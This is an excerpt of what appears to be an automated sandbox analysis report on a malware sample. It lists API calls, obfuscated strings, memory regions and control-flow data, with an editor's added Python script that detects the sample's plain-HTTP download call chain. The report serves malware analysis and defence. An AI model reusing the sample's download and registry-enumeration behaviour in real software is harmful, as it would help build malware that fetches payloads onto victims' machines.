• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: puu2B7m$#$111$246122658369$FFNmLv==$FlpmMdzrTXUg$GlNgUSfi8Dy=$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4234742559-2205604348
                                                                                                                                                                  • Opcode ID: 87982022ba2e89063212463aad95a3762405f0159821735a3a3ab26b4e332b06
                                                                                                                                                                  • Instruction ID: 80a228f247841842e12304944aecc4d8ac4e59830924b437a4cbbb4c14f26ef6
                                                                                                                                                                  • Opcode Fuzzy Hash: 87982022ba2e89063212463aad95a3762405f0159821735a3a3ab26b4e332b06
                                                                                                                                                                  • Instruction Fuzzy Hash: 89337971A101589BEF18DF38DC8979DBB72AF85304F2082ACE405AB7D6DB358AC5CB51

Control-flow Graph (edge list only; the rendered graph is not recoverable): entry block c2bd60-c2bdac; block c2bdc6-c2be4f calls InternetOpenW and InternetConnectA; c2be53-c2be6f calls HttpOpenRequestA; c2bf13-c2bf29 calls HttpSendRequestA; c2bfb3-c2bfd4 calls InternetReadFile; c2bfe0-c2c090 calls c54180; the remaining blocks up to c2c274 branch through the internal subroutines c37f30, c37870, c25b20, c3d593, c3cf21 and c56b9a.
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000), ref: 00C2BF1A
                                                                                                                                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00C2BFCD
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0A7
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0AF
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated regions: identical to the list given for the function above.
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                                                                                                                  • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 688256393-332458646
                                                                                                                                                                  • Opcode ID: 1f3ea34df5f0cefc6c78bb79f1d89c19fbb3e400cdc7169fe837c0205ba28b8e
                                                                                                                                                                  • Instruction ID: 1754fb3aacec764ac5e5225fbeddd03af6cc3933c007ae2314ad5ff4cb23098c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f3ea34df5f0cefc6c78bb79f1d89c19fbb3e400cdc7169fe837c0205ba28b8e
                                                                                                                                                                  • Instruction Fuzzy Hash: ACB1F5B1A101289BEB24CF28DC85BAEBB79EF45304F5041A8F509976C2DB749EC0CF95
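Added example (the editor's, not part of the Joe Sandbox report and not code from the sample): the eight WININET calls listed for the function at 00C2BD60 form the standard plain-HTTP fetch sequence InternetOpen, InternetConnect, HttpOpenRequest, HttpSendRequest, InternetReadFile, followed by three InternetCloseHandle calls that tear down the request, connection and session handles. The script below parses those API lines (copied verbatim from the list above as its sample input) and decodes the literal arguments the sandbox resolved: nServerPort 00000050 is 80, dwService 00000003 is INTERNET_SERVICE_HTTP, and InternetReadFile pulls 000003FF (1023) bytes per call; '?' marks arguments the sandbox did not resolve. The line regex and the chain heuristic are the editor's assumptions, not a Joe Sandbox feature, and pointer arguments such as the 00C78D70 user-agent string passed to InternetOpenW are not dereferenced.

```python
"""Flag the WinINet plain-HTTP download chain in a Joe Sandbox 'APIs' listing.

Added example for this report page: SAMPLE_LOG is copied from the function at
00C2BD60 above; the regex and the chain heuristic are the editor's own.
"""
import re

# Copied verbatim from the report's APIs list for the function at 00C2BD60.
SAMPLE_LOG = """\
• InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
• InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
• HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
• HttpSendRequestA.WININET(?,00000000), ref: 00C2BF1A
• InternetReadFile.WININET(?,?,000003FF,?), ref: 00C2BFCD
• InternetCloseHandle.WININET(?), ref: 00C2C0A7
• InternetCloseHandle.WININET(?), ref: 00C2C0AF
• InternetCloseHandle.WININET(?), ref: 00C2C0B7
"""

# Assumed line shape: "<bullet> Api.MODULE(arg,arg,...), ref: ADDRESS"
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# dwService values accepted by InternetConnect (wininet.h).
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}

# Call order that makes up one complete HTTP fetch; A/W suffixes are ignored.
DOWNLOAD_CHAIN = ["InternetOpen", "InternetConnect", "HttpOpenRequest", "HttpSendRequest", "InternetReadFile"]


def parse_calls(text):
    """Turn the bullet lines into dicts; lines of another shape ('Part of subcall ...') are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def arg_int(arg):
    """Hex argument as int; None where the sandbox printed '?' (value not resolved)."""
    return None if arg == "?" else int(arg, 16)


def base_name(api):
    """InternetConnectA / InternetOpenW -> InternetConnect / InternetOpen (assumes the usual A/W naming)."""
    return re.sub(r"[AW]$", "", api)


def find_http_download_chain(calls):
    """Return a summary dict if DOWNLOAD_CHAIN occurs in order among the calls, else None."""
    found = {}
    idx = 0
    for call in calls:
        if idx < len(DOWNLOAD_CHAIN) and base_name(call["api"]) == DOWNLOAD_CHAIN[idx]:
            found[DOWNLOAD_CHAIN[idx]] = call
            idx += 1
    if idx < len(DOWNLOAD_CHAIN):
        return None
    # InternetConnect(hInternet, lpszServerName, nServerPort, lpszUserName, lpszPassword, dwService, dwFlags, dwContext)
    connect_args = found["InternetConnect"]["args"]
    port = arg_int(connect_args[2])
    service = arg_int(connect_args[5])
    service_name = INTERNET_SERVICE.get(service, service)
    # InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead)
    chunk = arg_int(found["InternetReadFile"]["args"][2])
    return {
        "port": port,
        "service": service_name,
        "read_chunk": chunk,
        # three closes = request, connection and session handles released
        "close_handles": sum(1 for c in calls if c["api"] == "InternetCloseHandle"),
        "plaintext_http": service_name == "INTERNET_SERVICE_HTTP" and port == 80,
        "first_ref": hex(found["InternetOpen"]["ref"]),
    }


if __name__ == "__main__":
    print(find_http_download_chain(parse_calls(SAMPLE_LOG)))
```

Running the script prints the summary for the sample; to triage another function's listing, paste its APIs lines into SAMPLE_LOG. The same chain with dwService 3 but a port other than 80, or with INTERNET_FLAG_SECURE in HttpOpenRequest's flags, would still be an HTTP fetch but not the plaintext-on-80 case flagged here.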

Control-flow Graph (edge list only; the rendered graph is not recoverable): entry block c265b0-c26609, whose call at c2660a was observed resolving to eleven different targets (4ef0bcc through 4ef0cc8), all returning to block c2660f-c26688, which calls LookupAccountNameA; the remaining blocks up to c26916 branch through the internal subroutines c37870, c25b20, c22280, c37f30, c3d593, c3cf21 and c56b9a.
                                                                                                                                                                  APIs
                                                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00C26650
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated regions: identical to the list given for the function above.
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AccountLookupName
                                                                                                                                                                  • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                                                                                                                                                                  • API String ID: 1484870144-3856690409
                                                                                                                                                                  • Opcode ID: ae3b92465e541c0abb2f3e0ded24c67096f951027bc755206b452fd84efbcd08
                                                                                                                                                                  • Instruction ID: c29a1781441e25c029902f67d7b772e351119a9cae274c367ba1d6d96e60cd4a
                                                                                                                                                                  • Opcode Fuzzy Hash: ae3b92465e541c0abb2f3e0ded24c67096f951027bc755206b452fd84efbcd08
                                                                                                                                                                  • Instruction Fuzzy Hash: B991D1B190012C9BDB28DF28DC85BEDB779EB49304F4045E9E50997682DA319FC9CFA4
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00C2247E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated regions: identical to the list given for the function above.
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ___std_exception_copy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2659868963-0
                                                                                                                                                                  • Opcode ID: cd9c1bb19990b1c4837a1a1996e275003ebace2ca1c8852302f65d6bc6fccd5b
                                                                                                                                                                  • Instruction ID: 761b55c8f15a606e1ca4dd7a898f86f343842233622d31807f6d8769a51d9b52
                                                                                                                                                                  • Opcode Fuzzy Hash: cd9c1bb19990b1c4837a1a1996e275003ebace2ca1c8852302f65d6bc6fccd5b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51BFB2A106058FDB19CF69E8C57AEBBF0FB08310F24856AD816EB254D7749A40DF64
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                    • Part of subcall function 00C2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C34EA2
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00C36B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4201286991-2304726402
                                                                                                                                                                  • Opcode ID: 2e0cd48b92c814167ddb30fbceb252fe39c26e1a25189ad3276959135aec5c42
                                                                                                                                                                  • Instruction ID: 60569b0658d5b0e46968d51e1e8faa909007d74b02435f88e2830330b0fa840a
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e0cd48b92c814167ddb30fbceb252fe39c26e1a25189ad3276959135aec5c42
                                                                                                                                                                  • Instruction Fuzzy Hash: 14234871E201589BEF19DB28CD8979DBB72AF85304F50829CE009AB2C6DB359F85CF51
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                    • Part of subcall function 00C2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                    • Part of subcall function 00C2BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C34EA2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                                                                                                                                                                  • API String ID: 2414744145-1662704651
                                                                                                                                                                  • Opcode ID: f036ff14d176eac522f21f489dc1ce002433e6a6e0a976c97f936cd105deb612
                                                                                                                                                                  • Instruction ID: d3444fafce4faa1be05a915dd1e07b64cbd4fe40521ea204d15e68a4e56af95b
                                                                                                                                                                  • Opcode Fuzzy Hash: f036ff14d176eac522f21f489dc1ce002433e6a6e0a976c97f936cd105deb612
                                                                                                                                                                  • Instruction Fuzzy Hash: DD233671E202589BEB19DB28CD8979DBB769F81304F5082D8E009AB2C6DB359FC5CF51

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2638 c33550-c33589 2639 c34160-c34166 2638->2639 2640 c3358f-c335df call c37f30 2638->2640 2641 c34194-c341ac 2639->2641 2642 c34168-c34174 2639->2642 2653 c34237 call c38070 2640->2653 2654 c335e5-c3362b call c37f30 2640->2654 2646 c341da-c341f2 2641->2646 2647 c341ae-c341ba 2641->2647 2644 c34176-c34184 2642->2644 2645 c3418a-c34191 call c3d593 2642->2645 2644->2645 2649 c34273 call c56b9a 2644->2649 2645->2641 2655 c341f4-c34200 2646->2655 2656 c3421c-c34236 call c3cf21 2646->2656 2651 c341d0-c341d7 call c3d593 2647->2651 2652 c341bc-c341ca 2647->2652 2651->2646 2652->2649 2652->2651 2667 c3423c call c38070 2653->2667 2654->2653 2672 c33631-c3366f call c37f30 2654->2672 2657 c34212-c34219 call c3d593 2655->2657 2658 c34202-c34210 2655->2658 2657->2656 2658->2649 2658->2657 2674 c34241 call c56b9a 2667->2674 2672->2653 2677 c33675-c336c0 call c37f30 call c37870 call c25b20 2672->2677 2678 c34246 call c56b9a 2674->2678 2692 c336c2 2677->2692 2693 c336c4-c336f9 call c38ad0 2677->2693 2682 c3424b call c38070 2678->2682 2685 c34250 call c56b9a 2682->2685 2689 c34255 call c56b9a 2685->2689 2694 c3425a-c3425f call c3c0c9 2689->2694 2692->2693 2693->2667 2699 c336ff-c3372e call c37f30 2693->2699 2698 c34264 call c56b9a 2694->2698 2702 c34269-c3426e call c3c109 2698->2702 2704 c33730-c3373f 2699->2704 2705 c3375f-c33784 call c29820 2699->2705 2702->2649 2707 c33741-c3374f 2704->2707 2708 c33755-c3375c call c3d593 2704->2708 2713 c3378a-c337f2 call c37870 call c25b20 call c37f30 2705->2713 2714 c33c68-c33c6e 2705->2714 2707->2674 2707->2708 2708->2705 2750 c337f6-c3382d call c393a0 2713->2750 2751 c337f4 2713->2751 2715 c33c70-c33c7c 2714->2715 2716 c33c9c-c33ca2 2714->2716 2718 c33c92-c33c99 call c3d593 2715->2718 2719 c33c7e-c33c8c 2715->2719 2721 c33cd0-c33cd6 2716->2721 2722 c33ca4-c33cb0 
2716->2722 2718->2716 2719->2698 2719->2718 2723 c33d04-c33d1c 2721->2723 2724 c33cd8-c33ce4 2721->2724 2727 c33cb2-c33cc0 2722->2727 2728 c33cc6-c33ccd call c3d593 2722->2728 2732 c33d1e-c33d2d 2723->2732 2733 c33d4d-c33d53 2723->2733 2730 c33ce6-c33cf4 2724->2730 2731 c33cfa-c33d01 call c3d593 2724->2731 2727->2698 2727->2728 2728->2721 2730->2698 2730->2731 2731->2723 2739 c33d43-c33d4a call c3d593 2732->2739 2740 c33d2f-c33d3d 2732->2740 2733->2639 2736 c33d59-c33d65 2733->2736 2742 c34156-c3415d call c3d593 2736->2742 2743 c33d6b-c33d79 2736->2743 2739->2733 2740->2698 2740->2739 2742->2639 2743->2698 2748 c33d7f 2743->2748 2748->2742 2755 c3385a-c33867 2750->2755 2756 c3382f-c3383a 2750->2756 2751->2750 2759 c33869-c33878 2755->2759 2760 c33898-c3389f 2755->2760 2757 c33850-c33857 call c3d593 2756->2757 2758 c3383c-c3384a 2756->2758 2757->2755 2758->2678 2758->2757 2762 c3387a-c33888 2759->2762 2763 c3388e-c33895 call c3d593 2759->2763 2764 c33a63-c33a93 call c57443 call c58979 2760->2764 2765 c338a5-c338c7 2760->2765 2762->2678 2762->2763 2763->2760 2764->2694 2778 c33a99-c33a9c 2764->2778 2765->2682 2766 c338cd-c338ff call c37f30 call c2aca0 2765->2766 2779 c33901-c33907 2766->2779 2780 c33957-c33960 2766->2780 2778->2702 2781 c33aa2-c33aa5 2778->2781 2782 c33935-c33954 2779->2782 2783 c33909-c33915 2779->2783 2784 c33962-c33971 2780->2784 2785 c33991-c339d1 call c37870 * 2 call c24960 2780->2785 2781->2714 2786 c33aab 2781->2786 2782->2780 2788 c33917-c33925 2783->2788 2789 c3392b-c33932 call c3d593 2783->2789 2790 c33973-c33981 2784->2790 2791 c33987-c3398e call c3d593 2784->2791 2826 c339d3-c339d9 2785->2826 2827 c33a29-c33a32 2785->2827 2792 c33ab2-c33b77 call c37f30 call c37870 call c25b20 call c37870 * 5 2786->2792 2793 c33e52-c33eb4 call c37870 * 4 call c32e20 2786->2793 2794 c33d84-c33e4d call c37f30 call c37870 call c25b20 call c37870 * 5 2786->2794 2795 c33b9d-c33c62 call c37f30 call c37870 call c25b20 call c37870 * 5 call c31dd0 2786->2795 
2788->2685 2788->2789 2789->2782 2790->2685 2790->2791 2791->2785 2876 c33b7b-c33b8d call c37870 call c307f0 2792->2876 2793->2714 2794->2876 2795->2714 2833 c33a07-c33a26 2826->2833 2834 c339db-c339e7 2826->2834 2827->2764 2831 c33a34-c33a43 2827->2831 2838 c33a45-c33a53 2831->2838 2839 c33a59-c33a60 call c3d593 2831->2839 2833->2827 2841 c339e9-c339f7 2834->2841 2842 c339fd-c33a04 call c3d593 2834->2842 2838->2689 2838->2839 2839->2764 2841->2689 2841->2842 2842->2833 2882 c33b92-c33b98 2876->2882 2882->2714
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C3425F
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: "$5120$Fz==$HBhr$V5Qk$W07l$WJms$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4234742559-3767745505
                                                                                                                                                                  • Opcode ID: e31f730c26b2971ec0aa405e49a17ec71057f44f0a4e7f95e29fb4b6429b9d9d
                                                                                                                                                                  • Instruction ID: 087ed5ee0153873bd756f2f24893d141dd0d9b65704c4a0153f404454d74003a
                                                                                                                                                                  • Opcode Fuzzy Hash: e31f730c26b2971ec0aa405e49a17ec71057f44f0a4e7f95e29fb4b6429b9d9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A5225B1A20248DBEF18EF78CC4A79DBB75AF45304F50429CE405A72C2D7359B84DBA2

Control-flow Graph (rendered graph omitted; only the information recoverable from the graph data is kept)
• Function entry c25c60, basic blocks c25c60-c2624d
• Calls, in block order: c54020, RegOpenKeyExA, RegCloseKey, c37f30, c3cf21, c3d593, c56b9a, c3e080, c37f30 (x5), RegOpenKeyExA (second call site, block c25f26-c260ad), c54020, RegEnumValueW (loop at c26153-c26187), c37c50, c38090, c37870 (x2), c25c60 (a call back to this function's own entry, block c261bb-c2624d)
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?), ref: 00C25CDC
                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?,00000000,00000001,?), ref: 00C25D16
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
